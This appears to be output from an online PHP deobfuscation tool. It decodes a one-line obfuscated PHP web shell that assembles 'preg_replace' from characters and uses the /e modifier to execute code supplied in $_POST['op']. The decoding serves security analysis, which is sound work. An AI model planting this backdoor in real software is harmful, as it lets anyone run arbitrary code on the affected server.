Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; //preg_replace $hh(..
Decoded Output download
<?php
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; //preg_replace
$hh("/littlehann/e",$_POST['op'],"111littlehann222");
?>
Did this file decode correctly?
Original Code
<?php
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; //preg_replace
$hh("/littlehann/e",$_POST['op'],"111littlehann222");
?>
Function Calls
preg_replace | 1 |
Stats
MD5 | f7714566d634c1d7eb27379388f7335e |
Eval Count | 1 |
Decode Time | 99 ms |